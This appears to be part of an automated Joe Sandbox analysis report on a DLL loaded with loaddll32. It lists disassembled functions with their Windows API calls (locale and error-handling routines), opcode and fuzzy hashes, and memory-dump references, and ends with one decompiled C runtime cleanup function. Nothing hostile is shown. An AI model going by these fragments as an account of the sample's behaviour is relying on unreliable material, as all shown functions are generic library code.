Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: f8904946f47584ef7224fa9fd7e1e72cce858464b6813a46a32b6b9e2a7b15e8
Instruction ID: d042448101073f7726092af00e043f2e2b0638077aca404e9bc8bc5148471b08
Opcode Fuzzy Hash: f8904946f47584ef7224fa9fd7e1e72cce858464b6813a46a32b6b9e2a7b15e8
Instruction Fuzzy Hash: 1CE0EC7101061DEFCF856F94CE1CE993B7BFF41246F149968F9098A121CB35E962CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E25E077, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6E24D5FF: GetLastError.KERNEL32(?,6E2DCE94,6E241803,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,B0FC4CAD), ref: 6E24D603
Part of subcall function 6E24D5FF: _free.LIBCMT ref: 6E24D636
Part of subcall function 6E24D5FF: SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,B0FC4CAD), ref: 6E24D677
Part of subcall function 6E24D5FF: _abort.LIBCMT ref: 6E24D67D

EnumSystemLocalesW.KERNEL32(6E25E19F,00000001,00000000,?,;$n,?,6E25E7CC,00000000,?,?,?), ref: 6E25E0E9

Strings

;$n, xrefs: 6E25E07C

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID: ;$n
API String ID: 1084509184-2794363061
Opcode ID: 11c6b9ad7d8f2f4636e2d9edb2692050f3dba1bac2feb3ab5d564461732029ef
Instruction ID: c5268752b6b21a6ba36eb512e40a4ae5c964d845337742fb4b887dc29805cb74
Opcode Fuzzy Hash: 11c6b9ad7d8f2f4636e2d9edb2692050f3dba1bac2feb3ab5d564461732029ef
Instruction Fuzzy Hash: 6C114C3B2047059FDB089F79C9906BABBA3FF80359B18882CD94787B40D371B952CB40

Uniqueness

Uniqueness Score: -1.00%

Function 6E25DF65, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 6E24D5FF: GetLastError.KERNEL32(?,6E2DCE94,6E241803,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,B0FC4CAD), ref: 6E24D603
Part of subcall function 6E24D5FF: _free.LIBCMT ref: 6E24D636
Part of subcall function 6E24D5FF: SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,B0FC4CAD), ref: 6E24D677
Part of subcall function 6E24D5FF: _abort.LIBCMT ref: 6E24D67D

Part of subcall function 6E24D5FF: _free.LIBCMT ref: 6E24D65E
Part of subcall function 6E24D5FF: SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,B0FC4CAD), ref: 6E24D66B

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,B$n,00000000,?), ref: 6E25DFB9

Strings

t!'nE, xrefs: 6E25DE09
)'nU, xrefs: 6E25DDD4
B$n, xrefs: 6E25DE8F, 6E25DED7, 6E25DF7F

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID: )'nU$B$n$t!'nE
API String ID: 1663032902-2691769108
Opcode ID: fecf4577095f5a7725a70fa91fd4f48c65a2f9cf289ac8b996cc670c0026fe1e
Instruction ID: 070c26c87fc205cb1a710e4f385427ab01c698bea7a0f81726eed104ee1e730b
Opcode Fuzzy Hash: fecf4577095f5a7725a70fa91fd4f48c65a2f9cf289ac8b996cc670c0026fe1e
Instruction Fuzzy Hash: ABF0F432A5010EEBD7149FB8D848EFB73ADDB45315F0445BAE906DB240EF34AD048BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E25E112, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6E24D5FF: GetLastError.KERNEL32(?,6E2DCE94,6E241803,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,B0FC4CAD), ref: 6E24D603
Part of subcall function 6E24D5FF: _free.LIBCMT ref: 6E24D636
Part of subcall function 6E24D5FF: SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,B0FC4CAD), ref: 6E24D677
Part of subcall function 6E24D5FF: _abort.LIBCMT ref: 6E24D67D

EnumSystemLocalesW.KERNEL32(6E25E3EF,00000001,00000006,?,;$n,?,6E25E790,;$n,?,?,?,?,?,6E24E03B,?,?), ref: 6E25E15E

Strings

;$n, xrefs: 6E25E117

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID: ;$n
API String ID: 1084509184-2794363061
Opcode ID: c993478e04a960fa24bc651fd01b3635cb726ab7a21e2171dc5c512deb6dc764
Instruction ID: 8588b83bd66dadfff62ad15be9efa28ae53a4f2d4b1ed8f883b9019257b311bc
Opcode Fuzzy Hash: c993478e04a960fa24bc651fd01b3635cb726ab7a21e2171dc5c512deb6dc764
Instruction Fuzzy Hash: 39F0C2762043096FD7146FB9CD80A6A7BA7EF8176CB09842DFA068B740D671AC41CA50

Uniqueness

Uniqueness Score: -1.00%

Function 6E254323, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,6E24DA1E,?,00000004), ref: 6E254376

Strings

GetLocaleInfoEx, xrefs: 6E254334, 6E25433E

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: 91ee40b5ffc5123031bf5ebba5c07fe95f63e086dfedb6de1f60e2f868c52316
Instruction ID: 69537425614e064cb6d92b0bbc000163847fa0dba9547c4b740c1021efeb8df1
Opcode Fuzzy Hash: 91ee40b5ffc5123031bf5ebba5c07fe95f63e086dfedb6de1f60e2f868c52316
Instruction Fuzzy Hash: 7CF0CD3194161CBBCF115FE08C08EAF7BA7EF49601F104545FC156A350CB328A209AA4

Uniqueness

Uniqueness Score: -1.00%

Function 6E235150, Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 279d36cb624a28dc2fc8018b7e3dec838c29ea01aa9c7dd68c94839918219c16
Instruction ID: fc724374c75bd5d6ca4ab59dbacb14a7ba219d73294d4f4f61d83fff8a468e5b
Opcode Fuzzy Hash: 279d36cb624a28dc2fc8018b7e3dec838c29ea01aa9c7dd68c94839918219c16
Instruction Fuzzy Hash: FA024EB1E5022A9FDB14CFA9C89069DF7F6FF88315F25826AD919E7344D730A9418F80

Uniqueness

Uniqueness Score: -1.00%

Function 6E250396, Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6E250391,?,?,00000008,?,?,6E263E64,00000000), ref: 6E2505C3

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: b7281d7e929025f6a99127b309e80d3231c12e82d9bbb37aeb10fa17755ed010
Instruction ID: 94b8b24184486c6a78cb0150605c6d54269d58d406fc2b4e0250a2c8a1ad7ce2
Opcode Fuzzy Hash: b7281d7e929025f6a99127b309e80d3231c12e82d9bbb37aeb10fa17755ed010
Instruction Fuzzy Hash: 6FB1BC3112060A8FD704CF68C996F657BE2FF45369F258658E8A9CF3A1D335E9A1CB40

Uniqueness

Uniqueness Score: -1.00%

Function 6E25E3EF, Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 6E24D5FF: GetLastError.KERNEL32(?,6E2DCE94,6E241803,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,B0FC4CAD), ref: 6E24D603
Part of subcall function 6E24D5FF: _free.LIBCMT ref: 6E24D636
Part of subcall function 6E24D5FF: SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,B0FC4CAD), ref: 6E24D677
Part of subcall function 6E24D5FF: _abort.LIBCMT ref: 6E24D67D

Part of subcall function 6E24D5FF: _free.LIBCMT ref: 6E24D65E
Part of subcall function 6E24D5FF: SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,B0FC4CAD), ref: 6E24D66B

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6E25E443

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: 22521fcaf741af358c8dcf1959a4be017b2f123ca5be826dd0f236ec5b4642f2
Instruction ID: da4aa7572b4958cb38846d9e34e8944f05fc68ffe708de95caf6d6bbd1faff0f
Opcode Fuzzy Hash: 22521fcaf741af358c8dcf1959a4be017b2f123ca5be826dd0f236ec5b4642f2
Instruction Fuzzy Hash: 4321C17692421F9BDB188BA4CD45BBA73AEEF00325F00407AED01C6244EF749954DB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E25E61F, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 6E24D5FF: GetLastError.KERNEL32(?,6E2DCE94,6E241803,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,B0FC4CAD), ref: 6E24D603
Part of subcall function 6E24D5FF: _free.LIBCMT ref: 6E24D636
Part of subcall function 6E24D5FF: SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,B0FC4CAD), ref: 6E24D677
Part of subcall function 6E24D5FF: _abort.LIBCMT ref: 6E24D67D

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,6E25E3BD,00000000,00000000,?), ref: 6E25E64B

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: 78469dbd648527aca6e70de360f3c2de1987a66e35c7bba1667dd13229a76a76
Instruction ID: fcf036781d1056c13554fcf12e33c32360bf9da21b036691b4ca13d7534efb0f
Opcode Fuzzy Hash: 78469dbd648527aca6e70de360f3c2de1987a66e35c7bba1667dd13229a76a76
Instruction Fuzzy Hash: EEF04E3661411B6FDB144BD4C905BBB3769EB00369F01442ADD15A3240EA70FD11CAD0

Uniqueness

Uniqueness Score: -1.00%

Function 6E253952, Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6E242361: EnterCriticalSection.KERNEL32(-000BFC7F,?,6E2492B1,00000000,6E2C2CE8,0000000C,6E24926C,?,?,?,6E24C822,?,?,6E24D6B4,00000001,00000364), ref: 6E242370

EnumSystemLocalesW.KERNEL32(6E25390C,00000001,6E2C3078,0000000C), ref: 6E25398A

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: a0bfb52c658e0802913f11a0cbc6835c52cf010153108ed149eba7eea0597b12
Instruction ID: 5d1bff0ec32b92611c2cd97dc2d1dbb8541a7befe2c8923d69e07add4d7a4b19
Opcode Fuzzy Hash: a0bfb52c658e0802913f11a0cbc6835c52cf010153108ed149eba7eea0597b12
Instruction Fuzzy Hash: 47F03776950608EFDB54DFA8C44DB9D3BF2BB06B24F108956E810DB291CB749940DF92

Uniqueness

Uniqueness Score: -1.00%

Function 6E25E00E, Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6E24D5FF: GetLastError.KERNEL32(?,6E2DCE94,6E241803,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,B0FC4CAD), ref: 6E24D603
Part of subcall function 6E24D5FF: _free.LIBCMT ref: 6E24D636
Part of subcall function 6E24D5FF: SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,B0FC4CAD), ref: 6E24D677
Part of subcall function 6E24D5FF: _abort.LIBCMT ref: 6E24D67D

EnumSystemLocalesW.KERNEL32(6E25DF65,00000001,00000006,?,?,6E25E7EE,;$n,?,?,?,?,?,6E24E03B,?,?,?), ref: 6E25E045

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 311b9bf6d4d057f1019f2672fc74a38ee296865ed68604af18f2cec709b53045
Instruction ID: 2356b37d2de94d25240dfa275c7a893b62f0875a67eab357b3aae102bf17e625
Opcode Fuzzy Hash: 311b9bf6d4d057f1019f2672fc74a38ee296865ed68604af18f2cec709b53045
Instruction Fuzzy Hash: 71F0E53A30024A57CB089F79CA4466A7FE6EFC1719B0A4059EA098B740CA75D842CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E23E079, Relevance: 1.5, Strings: 1, Instructions: 214COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 6E23E1E9

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: c3b3a44a33e3dfe07a1a69b5db6e0a9dd8f9e9e3da1b76fad72fd456ee2bed9f
Instruction ID: e6ba85e52a162438898bda3e61d71c4f65ccde87ac25c08451cec3332309e027
Opcode Fuzzy Hash: c3b3a44a33e3dfe07a1a69b5db6e0a9dd8f9e9e3da1b76fad72fd456ee2bed9f
Instruction Fuzzy Hash: B95158F022477F9BDBB045E84460BEF279B9B42305F38091AD8D1AB282D285DD0E8F53

Uniqueness

Uniqueness Score: -1.00%

Function 6E2484BB, Relevance: .7, Instructions: 669COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8523af5c97278a256f956927936cddcbb9548291b82c93668b5720af8e6ace69
Instruction ID: 09fbcbddc15850d5c15c256fbbcc58d611ef93f1c6185f237ceceb75ee90309a
Opcode Fuzzy Hash: 8523af5c97278a256f956927936cddcbb9548291b82c93668b5720af8e6ace69
Instruction Fuzzy Hash: 3D327F74E2010EDFDB0CCF98C991AAEB7B6FF85304F244168E94597309D731AA56CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E2567D9, Relevance: .6, Instructions: 637COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26f1272149449b7af9ad97af1d8525aaf45abb8a92a8d606b967ee3fe6bef159
Instruction ID: 72ceaefb33fac22069d6d392c949135591c7e11d11218023bd56dcd873596d64
Opcode Fuzzy Hash: 26f1272149449b7af9ad97af1d8525aaf45abb8a92a8d606b967ee3fe6bef159
Instruction Fuzzy Hash: 26325721D79F164EDB235634C972325A25EAFB73C5F10D727F81AB5AA9EB29C0C38101

Uniqueness

Uniqueness Score: -1.00%

Function 6E223E00, Relevance: .1, Instructions: 76COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: a61828d941d93e4053065eadb59b3be0b6c6f47e138728706572f73e25406b53
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 71112EB764008B8FD28189EDC4BC6BBA397FFF9326728437AD1614B658D223914D9600

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E16BC, Relevance: .0, Instructions: 27COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de327c7815a3b8948efe514a3961ad79ff2babd24348f1ac3403d3fac0d27517
Instruction ID: 9da26caa93565a07a100f2643b27fc5b473e7a53dd75feed7f1fce75cd75777f
Opcode Fuzzy Hash: de327c7815a3b8948efe514a3961ad79ff2babd24348f1ac3403d3fac0d27517
Instruction Fuzzy Hash: 1CF01535700A45AFDB04CF58C954F2AB7E9FB0DA10F248669E826CBB91DB75E844CA50

Uniqueness

Uniqueness Score: -1.00%

Function 6E25BF64, Relevance: 19.6, APIs: 13, Instructions: 114
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6E25BF64(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x6e2c50b8) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E6E24CBD3(_t46);
							E6E25C7CF( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E6E24CBD3(_t47);
							E6E25CCC3( *((intOrPtr*)(_t74 + 0x88)));
						}
						E6E24CBD3( *((intOrPtr*)(_t74 + 0x7c)));
						E6E24CBD3( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E6E24CBD3( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E6E24CBD3( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E6E24CBD3( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E6E24CBD3( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E6E25C0D7( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t16 = _t74 + 0xa0; // 0xa0
				_t55 = _t16;
				_v8 = _t28;
				_t18 = _t74 + 0x28; // 0x28
				_t70 = _t18;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x6e2c52b0) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E6E24CBD3(_t31);
							E6E24CBD3( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E6E24CBD3(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E6E24CBD3(_t74);
			}

0x6e25bf6c
0x6e25bf70
0x6e25bf78
0x6e25bf81
0x6e25bf86
0x6e25bf8d
0x6e25bf95
0x6e25bf9d
0x6e25bfa8
0x6e25bfae
0x6e25bfaf
0x6e25bfb7
0x6e25bfbf
0x6e25bfca
0x6e25bfd0
0x6e25bfd4
0x6e25bfdf
0x6e25bfe5
0x6e25bf86
0x6e25bfe6
0x6e25bfee
0x6e25c001
0x6e25c014
0x6e25c022
0x6e25c02d
0x6e25c032
0x6e25c03b
0x6e25c043
